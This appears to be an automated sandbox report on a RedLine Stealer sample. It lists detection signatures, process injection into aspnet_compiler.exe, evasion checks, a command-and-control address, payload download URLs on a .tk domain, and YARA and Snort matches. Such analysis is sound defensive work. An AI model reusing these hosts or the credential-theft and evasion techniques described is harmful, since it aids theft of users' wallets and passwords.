Edit tour

Windows Analysis Report
StZAEFSb2j.exe

Overview

General Information

Sample Name:	StZAEFSb2j.exe
Analysis ID:	736967
MD5:	c71616e2b7cedf9fc8e2ca6f6929abdf
SHA1:	896a4c41792c73db51074ccff5ef3f0577f510c5
SHA256:	4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

StZAEFSb2j.exe (PID: 780 cmdline: C:\Users\user\Desktop\StZAEFSb2j.exe MD5: C71616E2B7CEDF9FC8E2CA6F6929ABDF)

aspnet_compiler.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["194.55.186.201:6008"], "Bot Id": "xxxPROFxxx"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x535ca:$a4: get_ScannedWallets 0x6b1ea:$a4: get_ScannedWallets 0x52428:$a5: get_ScanTelegram 0x6a048:$a5: get_ScanTelegram 0x5324e:$a6: get_ScanGeckoBrowsersPaths 0x6ae6e:$a6: get_ScanGeckoBrowsersPaths 0x5106a:$a7: <Processes>k__BackingField 0x68c8a:$a7: <Processes>k__BackingField 0x4ef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x66b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x5099e:$a9: <ScanFTP>k__BackingField 0x685be:$a9: <ScanFTP>k__BackingField
00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: StZAEFSb2j.exe PID: 780	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: StZAEFSb2j.exe PID: 780	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: StZAEFSb2j.exe PID: 780	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x381a4:$a4: get_ScannedWallets 0x3704b:$a5: get_ScanTelegram 0x37e2d:$a6: get_ScanGeckoBrowsersPaths 0x35cde:$a7: <Processes>k__BackingField 0x33211:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x35612:$a9: <ScanFTP>k__BackingField
Process Memory Space: aspnet_compiler.exe PID: 1592	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1592	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x102b92:$a4: get_ScannedWallets 0x101a39:$a5: get_ScanTelegram 0x10281b:$a6: get_ScanGeckoBrowsersPaths 0x1006cc:$a7: <Processes>k__BackingField 0xfdbff:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x100000:$a9: <ScanFTP>k__BackingField
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.StZAEFSb2j.exe.42f9000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.StZAEFSb2j.exe.42f9000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.StZAEFSb2j.exe.42f9000.5.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147f6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147d7:$v2_6: GetUpdates
0.2.StZAEFSb2j.exe.42f9000.5.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
1.0.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.aspnet_compiler.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d7:$v2_6: GetUpdates
1.0.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
Click to see the 7 entries

Snort Signatures

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.856572532012811 11/03/22-12:44:38.337914
SID:	2012811
Source Port:	56572
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Windows executable base64 encoded - Source IP: 50.115.174.192 - Destination IP: 192.168.2.4

Timestamp:	50.115.174.192192.168.2.4443496952018856 11/03/22-12:44:39.556293
SID:	2018856
Source Port:	443
Destination Port:	49695
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Windows executable base64 encoded - Source IP: 50.115.174.192 - Destination IP: 192.168.2.4

Timestamp:	50.115.174.192192.168.2.4443496962018856 11/03/22-12:44:40.820043
SID:	2018856
Source Port:	443
Destination Port:	49696
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.55.186.201:6008Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: tgc8x.tk

Source: global traffic	HTTP traffic detected: GET /tt/lamb.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk

Source: unknown

HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.4:49695 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E446A8	0_2_00E446A8
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E40448	0_2_00E40448
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E419D0	0_2_00E419D0
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E47321	0_2_00E47321
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E45129	0_2_00E45129
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E48108	0_2_00E48108
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E40439	0_2_00E40439
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E419C1	0_2_00E419C1
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Code function: 0_2_00E43F60	0_2_00E43F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_02E2DE10	1_2_02E2DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_02E2D2F0	1_2_02E2D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0620E7D0	1_2_0620E7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_06206400	1_2_06206400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_062015A8	1_2_062015A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0620DF00	1_2_0620DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_06201AB8	1_2_06201AB8

Source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.322199547.0000000005010000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321430350.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000000.307650279.00000000005D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321384668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe, 00000000.00000002.321334213.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs StZAEFSb2j.exe
Source: StZAEFSb2j.exe	Binary or memory string: OriginalFilenameXCBVNDDJD.exe4 vs StZAEFSb2j.exe

Source: StZAEFSb2j.exe	ReversingLabs: Detection: 34%
Source: StZAEFSb2j.exe	Virustotal: Detection: 25%

Source: StZAEFSb2j.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\StZAEFSb2j.exe C:\Users\user\Desktop\StZAEFSb2j.exe
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StZAEFSb2j.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA487.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/26@3/2

Source: tmpA487.tmp.1.dr, tmpE406.tmp.1.dr, tmpCF62.tmp.1.dr, tmpE3D6.tmp.1.dr, tmpE3B6.tmp.1.dr, tmpA4F5.tmp.1.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: StZAEFSb2j.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01

Source: C:\Users\user\Desktop\StZAEFSb2j.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\StZAEFSb2j.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\StZAEFSb2j.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: StZAEFSb2j.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: StZAEFSb2j.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: StZAEFSb2j.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: XCBVNDDJD.pdb source: StZAEFSb2j.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: StZAEFSb2j.exe, u206e????????????????????????????????????????.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
